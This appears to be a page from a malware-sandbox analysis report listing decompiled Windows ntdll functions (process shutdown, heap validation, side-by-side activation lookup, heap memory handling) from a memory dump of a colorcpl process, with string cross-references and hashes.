C-Code - Quality: 67%

			E0436D6D0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t68;
				intOrPtr _t70;
				signed int _t78;
				signed char _t79;
				intOrPtr _t85;
				intOrPtr _t88;
				intOrPtr _t97;
				char _t99;
				signed int _t102;
				signed int _t103;
				signed char _t106;
				signed int _t108;
				signed int _t112;
				intOrPtr _t119;
				intOrPtr _t121;
				intOrPtr _t122;
				intOrPtr _t127;
				intOrPtr _t129;
				intOrPtr _t134;
				signed int _t137;
				signed int _t138;
				void* _t141;
				void* _t143;

				_push(0x68);
				_push(0x441c5e8);
				_t68 = E04397BE4(__ebx, __edi, __esi);
				_t127 =  *[fs:0x18];
				_t97 =  *((intOrPtr*)(_t127 + 0x30));
				if( *0x4435da8 != 0) {
					L19:
					 *[fs:0x0] =  *((intOrPtr*)(_t141 - 0x10));
					return _t68;
				}
				_t102 =  *(_t97 + 0x10);
				 *((intOrPtr*)(_t141 - 0x30)) =  *((intOrPtr*)(_t102 + 0x40));
				_t70 =  *((intOrPtr*)(_t102 + 0x44));
				 *((intOrPtr*)(_t141 - 0x2c)) = _t70;
				_t103 =  *(_t97 + 0x10);
				if(( *(_t103 + 8) & 0x00000001) == 0) {
					 *((intOrPtr*)(_t141 - 0x2c)) = _t70 + _t103;
				}
				if(( *0x44337c0 & 0x00000005) != 0) {
					_push(_t141 - 0x30);
					E043BE692("minkernel\\ntdll\\ldrinit.c", 0x17f5, "LdrShutdownProcess", 2, "Process 0x%p (%wZ) exiting\n",  *((intOrPtr*)(_t127 + 0x20)));
					_t143 = _t143 + 0x1c;
				}
				_t74 =  *((intOrPtr*)(_t127 + 0x24));
				 *0x4435dac =  *((intOrPtr*)(_t127 + 0x24));
				 *0x4435da8 = 1;
				if( *0x44365f0 != 0) {
					_t137 =  *0x44391f8; // 0x0
					asm("ror esi, cl");
					_t138 = _t137 ^  *0x7ffe0330;
					_t103 = _t138;
					 *0x44391e0(0x20);
					_t74 =  *_t138();
				}
				_t118 =  *((intOrPtr*)(_t127 + 0xfb4));
				if( *((intOrPtr*)(_t127 + 0xfb4)) != 0) {
					_push(1);
					E04344779(_t74, _t118);
				}
				if(( *0x443391c & 0x00000002) == 0) {
					_t78 =  *(_t97 + 0x10);
					__eflags =  *(_t78 + 8) & 0x40000000;
					_t106 = _t103 & 0xffffff00 | ( *(_t78 + 8) & 0x40000000) == 0x00000000;
					__eflags =  *0x4439234 & 0x00000001;
					_t79 = _t78 & 0xffffff00 | ( *0x4439234 & 0x00000001) == 0x00000000;
					__eflags = _t79 & _t106;
					if((_t79 & _t106) == 0) {
						goto L7;
					}
					 *((char*)(_t141 - 0x19)) = 1;
					_t99 = 0;
					L15:
					_t85 =  *[fs:0x30];
					__eflags =  *0x44368c8;
					if( *0x44368c8 != 0) {
						__eflags =  *((intOrPtr*)(_t85 + 0x18)) - _t99;
						if( *((intOrPtr*)(_t85 + 0x18)) != _t99) {
							E043C0FC8();
							 *0x44368c8 = _t99;
						}
					}
					__eflags =  *((char*)(_t141 - 0x19));
					if( *((char*)(_t141 - 0x19)) == 0) {
						E0436D8F0();
					}
					_t68 = E0436D898();
					goto L19;
				}
				L7:
				_t99 = 0;
				 *((char*)(_t141 - 0x19)) = 0;
				_t129 =  *0x4435da0; // 0x271a3c0
				L8:
				if(_t129 != 0x4435d9c) {
					_t18 = _t129 - 0x10; // 0x271a3b0
					_t122 = _t18;
					 *((intOrPtr*)(_t141 - 0x24)) = _t122;
					_t20 = _t129 + 4; // 0x2713068
					_t129 =  *_t20;
					 *((intOrPtr*)(_t141 - 0x20)) = _t129;
					_t22 = _t122 + 0x1c; // 0x6f9254e0
					_t88 =  *_t22;
					 *((intOrPtr*)(_t141 - 0x28)) = _t88;
					if(_t88 != 0 && ( *(_t122 + 0x34) & 0x00080000) != 0) {
						 *((intOrPtr*)(_t141 - 0x54)) = 0x24;
						 *((intOrPtr*)(_t141 - 0x50)) = 1;
						_t112 = 7;
						memset(_t141 - 0x4c, 0, _t112 << 2);
						_t143 = _t143 + 0xc;
						_t31 = _t122 + 0x48; // 0x0
						E0435DC40(_t141 - 0x54,  *_t31);
						 *((intOrPtr*)(_t141 - 4)) = _t99;
						_t134 =  *((intOrPtr*)(_t141 - 0x24));
						_t157 =  *((intOrPtr*)(_t134 + 0x3a)) - _t99;
						if( *((intOrPtr*)(_t134 + 0x3a)) != _t99) {
							E0435F0A3(_t99, 0, _t134, _t134, 1, __eflags);
						}
						_push(1);
						_push(_t99);
						E0435DCD1(_t99,  *((intOrPtr*)(_t141 - 0x28)),  *((intOrPtr*)(_t134 + 0x18)), _t134, 1, _t157);
						 *((intOrPtr*)(_t141 - 4)) = 0xfffffffe;
						_t129 =  *((intOrPtr*)(_t141 - 0x20));
						E0436D886();
					}
					goto L8;
				}
				_t119 =  *0x4435b24; // 0x2711e28
				__eflags =  *((intOrPtr*)(_t119 + 0x3a)) - _t99;
				if( *((intOrPtr*)(_t119 + 0x3a)) != _t99) {
					 *((intOrPtr*)(_t141 - 0x78)) = 0x24;
					 *((intOrPtr*)(_t141 - 0x74)) = 1;
					_t108 = 7;
					memset(_t141 - 0x70, 0, _t108 << 2);
					_t47 = _t119 + 0x48; // 0x0
					E0435DC40(_t141 - 0x78,  *_t47);
					 *((intOrPtr*)(_t141 - 4)) = 1;
					_t121 =  *0x4435b24; // 0x2711e28
					E0435F0A3(_t99, 0, _t121, _t141 - 0x70 + _t108, 1, __eflags);
					 *((intOrPtr*)(_t141 - 4)) = 0xfffffffe;
					E0436D88F();
				}
				goto L15;
			}

0x0436d6d0
0x0436d6d2
0x0436d6d7
0x0436d6dc
0x0436d6e3
0x0436d6ed
0x0436d810
0x0436d813
0x0436d81f
0x0436d81f
0x0436d6f3
0x0436d6f9
0x0436d6fc
0x0436d6ff
0x0436d702
0x0436d709
0x043af0c2
0x043af0c2
0x0436d716
0x043af0cd
0x043af0e7
0x043af0ec
0x043af0ec
0x0436d71c
0x0436d71f
0x0436d724
0x0436d732
0x0436d86d
0x0436d873
0x0436d875
0x0436d877
0x0436d879
0x0436d87f
0x0436d87f
0x0436d738
0x0436d740
0x0436d742
0x0436d744
0x0436d744
0x0436d750
0x043af0f4
0x043af0f7
0x043af0fe
0x043af101
0x043af108
0x043af10b
0x043af10d
0x00000000
0x00000000
0x043af113
0x043af117
0x0436d7ed
0x0436d7ed
0x0436d7f3
0x0436d7fa
0x043af13c
0x043af13f
0x043af145
0x043af14a
0x043af14a
0x043af13f
0x0436d800
0x0436d804
0x0436d806
0x0436d806
0x0436d80b
0x00000000
0x0436d80b
0x0436d756
0x0436d756
0x0436d75a
0x0436d75d
0x0436d766
0x0436d76c
0x0436d76e
0x0436d76e
0x0436d771
0x0436d774
0x0436d774
0x0436d777
0x0436d77a
0x0436d77a
0x0436d77d
0x0436d782
0x0436d78d
0x0436d794
0x0436d799
0x0436d79f
0x0436d79f
0x0436d7a1
0x0436d7a7
0x0436d7ac
0x0436d7af
0x0436d7b2
0x0436d7b6
0x0436d7da
0x0436d7da
0x0436d7b8
0x0436d7b9
0x0436d7c0
0x0436d7c5
0x0436d7cc
0x0436d7cf
0x0436d7cf
0x00000000
0x0436d782
0x0436d7e1
0x0436d7e7
0x0436d7eb
0x0436d820
0x0436d827
0x0436d82c
0x0436d832
0x0436d834
0x0436d83a
0x0436d83f
0x0436d842
0x0436d84a
0x0436d84f
0x0436d856
0x0436d856
0x00000000

Strings

$, xrefs: 0436D78D
Process 0x%p (%wZ) exiting, xrefs: 043AF0D1
LdrShutdownProcess, xrefs: 043AF0D8
minkernel\ntdll\ldrinit.c, xrefs: 043AF0E2
$, xrefs: 0436D820

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
API String ID: 0-1975516107
Opcode ID: d4cfe2180ef81942e39afb2a5ad2522952df245f1bde3f479babe8b62e11098f
Instruction ID: 98ff71edf7cbd9891a12c196ab7481cd8b8136d05cea0261d983fa35f65704ba
Opcode Fuzzy Hash: d4cfe2180ef81942e39afb2a5ad2522952df245f1bde3f479babe8b62e11098f
Instruction Fuzzy Hash: A1510E71B003469FEB24DFA4D58879EBBB1FF44718F24A159C806AB684E774B985CB80

Uniqueness

Uniqueness Score: -1.00%

Function 04337662 Relevance: 6.3, Strings: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E04337662(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E0433B910();
					} else {
						E0433B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0433B910("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E0433B910(", passed to %s", _t29);
					}
					_push("\n");
					E0433B910();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x44347a1 = 1;
						asm("int3");
						 *0x44347a1 = 0;
					}
					return 0;
				}
				return 1;
			}

0x04337667
0x04337669
0x04337672
0x0439ad93
0x0439adb2
0x0439adb7
0x0439ad95
0x0439adaa
0x0439adaf
0x0439adc3
0x0439adcc
0x0439add4
0x0439adda
0x0439addb
0x0439ade0
0x0439adf0
0x0439adf2
0x0439adf9
0x0439adfa
0x0439adfa
0x00000000
0x0439ae01
0x00000000

Strings

HEAP: , xrefs: 0439ADB2
RtlFreeHeap, xrefs: 0439ADCE
HEAP[%wZ]: , xrefs: 0439ADA5
Invalid heap signature for heap at %p, xrefs: 0439ADBE
, passed to %s, xrefs: 0439ADCF

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
API String ID: 0-3061284088
Opcode ID: 63c20c9fdb7cbdc871dc00e6bf950cce3c554fce51bccc4ac1a83988ef564905
Instruction ID: 7238c70d60f4ac0ca34645ffc88b085c4c8042b2fc7d69a87835a14f68320955
Opcode Fuzzy Hash: 63c20c9fdb7cbdc871dc00e6bf950cce3c554fce51bccc4ac1a83988ef564905
Instruction Fuzzy Hash: 1E014C37144280AFE719A769E419F92B7D4DF42B3AF1D604AE0004BAE2CBE5BC40D550

Uniqueness

Uniqueness Score: -1.00%

Function 0437265C Relevance: 5.2, Strings: 4, Instructions: 249
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0437265C(signed char __ecx, signed int __edx, intOrPtr _a4, signed int* _a8, signed int* _a12, signed int* _a16) {
				signed int _v8;
				char _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				char* _v548;
				short _v550;
				short _v552;
				signed int* _v556;
				signed int* _v560;
				signed int* _v564;
				signed int _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				short _t95;
				intOrPtr _t96;
				void* _t104;
				signed int _t105;
				signed int* _t107;
				void* _t113;
				signed int _t119;
				intOrPtr _t120;
				void* _t121;
				char* _t128;
				void* _t129;
				signed int _t131;
				signed short _t139;
				signed int _t142;
				signed int _t147;
				signed int _t149;
				signed int _t154;

				_t141 = __edx;
				_v8 =  *0x443b370 ^ _t154;
				_v556 = _a12;
				_t128 =  &_v532;
				_v560 = _a8;
				_t147 = 0;
				_v564 = _a16;
				_t142 = 0;
				_v540 = __ecx;
				_v532 = 0;
				_t131 = 0;
				_v552 = 0;
				_t95 = 2;
				_v550 = _t95;
				_t96 = _a4;
				_v536 = 0;
				_v544 = 0;
				_v548 = _t128;
				if(_t96 == 0x431120c) {
					E043CEF10(0x33, 0, "SXS: %s() passed the empty activation context\n", "RtlpGetActivationContextDataStorageMapAndRosterHeader");
					_t148 = 0xc000000d;
					L39:
					return E04384B50(_t148, _t128, _v8 ^ _t154, _t141, _t142, _t148);
				}
				if(_v560 != 0) {
					 *_v560 =  *_v560 & 0;
					_t147 = 0;
				}
				if(_v556 != _t131) {
					 *_v556 =  *_v556 & _t131;
					_t147 = _t131;
				}
				if(_v564 != _t131) {
					 *_v564 =  *_v564 & _t142;
					_t131 = _t142;
				}
				if((_v540 & 0xfffffffc) != 0 || _t141 == 0 || _v560 == _t142 || _v556 == _t142) {
					_push(_v556);
					_push(_v560);
					_push(_t141);
					_push(_v540);
					E043CEF10(0x33, 0, "SXS: %s() bad parameters:\nSXS:    Flags                : 0x%lx\nSXS:    Peb                  : %p\nSXS:    ActivationContextData: %p\nSXS:    AssemblyStorageMap   : %p\n", "RtlpGetActivationContextDataStorageMapAndRosterHeader");
					_t148 = 0xc000000d;
					goto L37;
				} else {
					if(_t96 != 0) {
						if(_t96 == 0xfffffffc) {
							L24:
							_t57 = _t141 + 0x200; // 0x230
							_t131 = _t57;
							_t104 =  *_t131;
							_t58 = _t141 + 0x204; // 0x234
							_t147 = _t58;
							_v536 = _t131;
							_v544 = _t147;
							if(_t104 == 0) {
								L33:
								_t105 =  *_t147;
								L34:
								_t141 = _v556;
								 *_v556 = _t105;
								 *_v560 =  *_t131;
								_t107 = _v564;
								if(_t107 != 0) {
									 *_t107 = _t142;
								}
								_t148 = 0;
								L37:
								if(_t128 != 0 && _t128 !=  &_v532) {
									E04353B90( &_v552);
								}
								goto L39;
							}
							_t142 =  *((intOrPtr*)(_t104 + 0x18)) + _t104;
							L26:
							_t141 = 0;
							if( *_t131 != 0 &&  *_t147 == 0) {
								_t108 =  *(_t142 + 8);
								if( *(_t142 + 8) > 0x3ffffffc) {
									_t148 = 0xc0000095;
									goto L37;
								}
								_t129 = E04355D90(_t131,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xc + _t108 * 4);
								if(_t129 == 0) {
									_t148 = 0xc0000017;
									L51:
									_t128 = _v548;
									goto L37;
								}
								_t141 =  *(_t142 + 8);
								_t67 = _t129 + 0xc; // 0xc
								_t113 = E043733D0(_t129,  *(_t142 + 8), _t67);
								_t148 = _t113;
								if(_t113 < 0) {
									E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t129);
									goto L51;
								}
								_t147 = _v544;
								asm("lock cmpxchg [esi], ecx");
								if(0 != 0) {
									E04339303(_t129);
									E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t129);
								}
								_t131 = _v536;
								_t128 = _v548;
							}
							goto L33;
						}
						if((_v540 & 0x00000003) != 0) {
							goto L12;
						}
						_t55 = _t96 + 0x10; // 0x10
						_t131 = _t55;
						_t141 =  *_t131;
						if(_t141 == 0) {
							_t148 = 0xc00000e5;
							goto L39;
						}
						_t142 =  *((intOrPtr*)(_t141 + 0x18)) + _t141;
						_t105 = _t96 + 0x5c;
						goto L34;
					}
					L12:
					if(_t96 == 0xfffffffc || (_v540 & 0x00000002) != 0) {
						goto L24;
					} else {
						if(_t96 != 0) {
							if((_v540 & 0x00000001) == 0) {
								goto L26;
							}
						}
						_t31 = _t141 + 0x1f8; // 0x228
						_t131 = _t31;
						_t119 =  *_t131;
						_t32 = _t141 + 0x1fc; // 0x22c
						_t147 = _t32;
						_v536 = _t131;
						_v544 = _t147;
						if(_t119 == 0) {
							goto L33;
						}
						_t142 =  *((intOrPtr*)(_t119 + 0x18)) + _t119;
						_v568 = _t142;
						if( *_t147 != 0) {
							goto L26;
						}
						_t120 =  *((intOrPtr*)(_t141 + 0x10));
						_t141 = 0x208;
						_t139 =  *(_t120 + 0x38);
						_t142 =  *(_t120 + 0x3c);
						_t149 = _t139 & 0x0000ffff;
						_v540 = _t139;
						_t41 = _t149 + 0xe; // 0x23a
						_t121 = _t41;
						if(_t121 > 0x208) {
							if(_t121 <= 0xfffe) {
								_v550 = _t139 + 0xe;
								_t128 = E04355D60(_t139 + 0x0000000e & 0x0000ffff);
								_v548 = _t128;
								if(_t128 != 0) {
									L19:
									E043888C0(_t128, _t142, _t149);
									_t131 = _v536;
									_v552 = _v540 + 0xc;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsw");
									_t142 = _v568;
									_t147 = _v544;
									goto L26;
								}
								_t148 = 0xc0000017;
								goto L39;
							}
							_t148 = 0xc0000106;
							goto L39;
						}
						_t128 =  &_v532;
						_v550 = 0x208;
						_v548 = _t128;
						goto L19;
					}
				}
			}

0x0437265c
0x0437266e
0x04372675
0x0437267b
0x04372685
0x0437268b
0x04372691
0x04372697
0x0437269b
0x043726a1
0x043726a8
0x043726aa
0x043726b3
0x043726b4
0x043726bb
0x043726be
0x043726c4
0x043726ca
0x043726d5
0x043b1ff1
0x043b1ff9
0x04372906
0x04372916
0x04372916
0x043726e1
0x043726e9
0x043726eb
0x043726eb
0x043726f3
0x043726fb
0x043726fd
0x043726fd
0x04372705
0x0437270d
0x0437270f
0x0437270f
0x0437271b
0x043b20a8
0x043b20ae
0x043b20b4
0x043b20b5
0x043b20c9
0x043b20d1
0x00000000
0x04372741
0x04372743
0x04372813
0x0437283c
0x0437283c
0x0437283c
0x04372842
0x04372844
0x04372844
0x0437284a
0x04372850
0x04372858
0x043728d2
0x043728d2
0x043728d4
0x043728d4
0x043728da
0x043728e4
0x043728e6
0x043728ee
0x043728f0
0x043728f0
0x043728f2
0x043728f4
0x043728f6
0x043b20e2
0x043b20e2
0x00000000
0x043728f6
0x0437285d
0x0437285f
0x0437285f
0x04372863
0x04372869
0x04372871
0x043b205d
0x00000000
0x043b205d
0x0437288e
0x04372892
0x043b2067
0x043b2080
0x043b2080
0x00000000
0x043b2080
0x04372898
0x0437289b
0x043728a1
0x043728a6
0x043728aa
0x043b207b
0x00000000
0x043b207b
0x043728b0
0x043728ba
0x043728c0
0x043b208d
0x043b209e
0x043b209e
0x043728c6
0x043728cc
0x043728cc
0x00000000
0x04372863
0x0437281c
0x00000000
0x00000000
0x04372822
0x04372822
0x04372825
0x04372829
0x043b2003
0x00000000
0x043b2003
0x04372832
0x04372834
0x00000000
0x04372834
0x04372749
0x0437274c
0x00000000
0x0437275f
0x04372761
0x043b2014
0x00000000
0x00000000
0x043b201a
0x04372767
0x04372767
0x0437276d
0x0437276f
0x0437276f
0x04372775
0x0437277b
0x04372783
0x00000000
0x00000000
0x0437278c
0x04372791
0x04372797
0x00000000
0x00000000
0x0437279d
0x043727a0
0x043727a5
0x043727a8
0x043727ab
0x043727ae
0x043727b4
0x043727b4
0x043727b9
0x043b2024
0x043b2033
0x043b2043
0x043b2045
0x043b204d
0x043727d2
0x043727d5
0x043727e8
0x043727ee
0x043727fd
0x043727fe
0x043727ff
0x04372800
0x04372802
0x04372808
0x00000000
0x04372808
0x043b2053
0x00000000
0x043b2053
0x043b2026
0x00000000
0x043b2026
0x043727bf
0x043727c5
0x043727cc
0x00000000
0x043727cc
0x0437274c

Strings

SXS: %s() passed the empty activation context, xrefs: 043B1FE8
.Local, xrefs: 043727F8
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 043B1FE3, 043B20BB
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 043B20C0

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: abc1cc668006d0c16678f7f3c94f2b8a97adcd5e178d0294385b30e0a6cc14b0
Instruction ID: 9ccbe87be06ca54cf2952c819ee55e98b70ca941ff9d29117782bfaabddb06d6
Opcode Fuzzy Hash: abc1cc668006d0c16678f7f3c94f2b8a97adcd5e178d0294385b30e0a6cc14b0
Instruction Fuzzy Hash: 26A1B031A0022DEBDB34CF54C888B9AB3B4BF58314F1511EAD988A7651D735BE81CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0433F5C7 Relevance: 5.2, Strings: 4, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E0433F5C7(void* __ecx, void* __edx) {
				char _v36;
				char _v40;
				void* _v44;
				void* _v48;
				void* _v60;
				void* _v64;
				void* _v72;
				void* _v76;
				void* __ebx;
				intOrPtr _t63;
				void* _t66;
				signed int _t73;
				void* _t77;
				void* _t78;
				signed char* _t81;
				intOrPtr _t82;
				signed char* _t87;
				intOrPtr _t88;
				void* _t89;
				signed char* _t92;
				signed char _t98;
				void* _t110;
				void* _t130;
				void* _t136;
				signed int _t138;
				void* _t140;

				_t140 = (_t138 & 0xfffffff8) - 0x24;
				_t110 = __edx;
				_t136 = __ecx;
				E0433F858(__edx,  &_v36,  &_v40);
				if(E043768EA( *((intOrPtr*)(_t136 + 0x1f8)) -  *((intOrPtr*)(_t136 + 0x244)), _t136, _t136 + 0xd4) == 0) {
					_t128 = 0xc000012d;
					L17:
					_t63 =  *[fs:0x30];
					 *((intOrPtr*)(_t136 + 0x228)) =  *((intOrPtr*)(_t136 + 0x228)) + 1;
					__eflags =  *(_t63 + 0xc);
					if( *(_t63 + 0xc) == 0) {
						_push("HEAP: ");
						E0433B910();
					} else {
						E0433B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_v40);
					_push(_v36);
					_push(_t136);
					E0433B910("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t128);
					_t66 = 0;
					L15:
					return _t66;
				}
				if(( *(_t136 + 0x40) & 0x00040000) != 0) {
					_t130 = 0x40;
					_push(0);
					_push(0x1c);
					_push(_t140 + 0x1c);
					_push(3);
					_push(_t136);
					_push(0xffffffff);
					_t73 = E04382BE0();
					__eflags = _t73;
					if(_t73 < 0) {
						L22:
						E04405FED(0, _t136, 1,  *((intOrPtr*)(_t140 + 0x20)), 0, 0);
						goto L2;
					}
					__eflags =  *(_t140 + 0x18) & 0x00000060;
					if(( *(_t140 + 0x18) & 0x00000060) == 0) {
						goto L22;
					}
					__eflags =  *((intOrPtr*)(_t140 + 0x14)) - _t136;
					if( *((intOrPtr*)(_t140 + 0x14)) == _t136) {
						L3:
						_push(_t130);
						_push(0x1000);
						_push( &_v40);
						_push(0);
						_push( &_v36);
						_push(0xffffffff);
						_t77 = E04382B10();
						_t128 = _t77;
						if(_t77 < 0) {
							goto L17;
						}
						_t78 = E04353C40();
						_t131 = 0x7ffe0380;
						if(_t78 != 0) {
							_t81 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						} else {
							_t81 = 0x7ffe0380;
						}
						if( *_t81 != 0) {
							_t82 =  *[fs:0x30];
							__eflags =  *(_t82 + 0x240) & 0x00000001;
							if(( *(_t82 + 0x240) & 0x00000001) != 0) {
								E043FEFD3(_t110, _t136, _v36, _v40, 8);
							}
						}
						 *((intOrPtr*)(_t136 + 0x240)) =  *((intOrPtr*)(_t136 + 0x240)) - 1;
						 *((intOrPtr*)(_t136 + 0x244)) =  *((intOrPtr*)(_t136 + 0x244)) - _v40;
						if(E04353C40() != 0) {
							_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						} else {
							_t87 = _t131;
						}
						if( *_t87 != 0) {
							_t88 =  *[fs:0x30];
							__eflags =  *(_t88 + 0x240) & 0x00000001;
							if(( *(_t88 + 0x240) & 0x00000001) != 0) {
								__eflags = E04353C40();
								if(__eflags != 0) {
									_t131 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								E043FF1C3(_t110, _t136, _v36, __eflags, _v40,  *(_t136 + 0x74) << 3,  *_t131 & 0x000000ff);
							}
						}
						_t89 = E04353C40();
						_t132 = 0x7ffe038a;
						if(_t89 != 0) {
							_t92 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						} else {
							_t92 = 0x7ffe038a;
						}
						if( *_t92 != 0) {
							__eflags = E04353C40();
							if(__eflags != 0) {
								_t132 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							}
							E043FF1C3(_t110, _t136, _v36, __eflags, _v40,  *(_t136 + 0x74) << 3,  *_t132 & 0x000000ff);
						}
						 *((intOrPtr*)(_t136 + 0x21c)) =  *((intOrPtr*)(_t136 + 0x21c)) + 1;
						_t98 =  *(_t110 + 2);
						if((_t98 & 0x00000004) != 0) {
							E04398140(_v36, _v40, 0xfeeefeee);
							_t98 =  *(_t110 + 2);
						}
						 *(_t110 + 2) = _t98 & 0x00000017;
						_t66 = 1;
						goto L15;
					}
					goto L22;
				}
				L2:
				_t130 = 4;
				goto L3;
			}

0x0433f5cf
0x0433f5d9
0x0433f5e0
0x0433f5e3
0x0433f607
0x0439e162
0x0439e167
0x0439e167
0x0439e16d
0x0439e173
0x0439e177
0x0439e2dd
0x0439e2e2
0x0439e17d
0x0439e192
0x0439e197
0x0439e2e8
0x0439e2ec
0x0439e2f0
0x0439e2f7
0x0439e2ff
0x0433f6ba
0x0433f6c0
0x0433f6c0
0x0433f614
0x0439e19f
0x0439e1a0
0x0439e1a2
0x0439e1a8
0x0439e1a9
0x0439e1ab
0x0439e1ac
0x0439e1ae
0x0439e1b3
0x0439e1b5
0x0439e1c8
0x0439e1d6
0x00000000
0x0439e1d6
0x0439e1b7
0x0439e1bc
0x00000000
0x00000000
0x0439e1be
0x0439e1c2
0x0433f61d
0x0433f61d
0x0433f61e
0x0433f627
0x0433f628
0x0433f62e
0x0433f62f
0x0433f631
0x0433f636
0x0433f63a
0x00000000
0x00000000
0x0433f640
0x0433f645
0x0433f64c
0x0439e1e9
0x0433f652
0x0433f652
0x0433f652
0x0433f657
0x0439e1f3
0x0439e1f9
0x0439e200
0x0439e212
0x0439e212
0x0439e200
0x0433f661
0x0433f667
0x0433f674
0x0439e225
0x0433f67a
0x0433f67a
0x0433f67a
0x0433f67f
0x0439e22f
0x0439e235
0x0439e23c
0x0439e247
0x0439e249
0x0439e254
0x0439e254
0x0439e254
0x0439e26f
0x0439e26f
0x0439e23c
0x0433f685
0x0433f68a
0x0433f691
0x0439e282
0x0433f697
0x0433f697
0x0433f697
0x0433f69c
0x0439e291
0x0439e293
0x0439e29e
0x0439e29e
0x0439e29e
0x0439e2b9
0x0439e2b9
0x0433f6a2
0x0433f6a8
0x0433f6ad
0x0439e2d0
0x0439e2d5
0x0439e2d5
0x0433f6b5
0x0433f6b8
0x00000000
0x0433f6b8
0x00000000
0x0439e1c2
0x0433f61a
0x0433f61c
0x00000000

Strings

HEAP: , xrefs: 0439E2DD
HEAP[%wZ]: , xrefs: 0439E18D
ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0439E2F2
`, xrefs: 0439E1B7

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 2994545307-2586055223
Opcode ID: 4431003ef667c8c8e628aab4ae895ef7f43deda33d7681e54d34072198675eea
Instruction ID: 9b7c56e6c78050fb4adb0cb63102e5e397830c0c41787703a5c08d742c09d26c
Opcode Fuzzy Hash: 4431003ef667c8c8e628aab4ae895ef7f43deda33d7681e54d34072198675eea
Instruction Fuzzy Hash: 6D61D331604780AFEB25DB64C846F67B7E8EF84B54F041469F9A58B2E1D634FD00CB62

Uniqueness

Uniqueness Score: -1.00%

Function 043390F8 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

VirtualProtect Failed 0x%p %x, xrefs: 0439B849
HEAP: , xrefs: 0439B83C, 0439B879
HEAP[%wZ]: , xrefs: 0439B82F, 0439B86C
VirtualQuery Failed 0x%p %x, xrefs: 0439B886

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

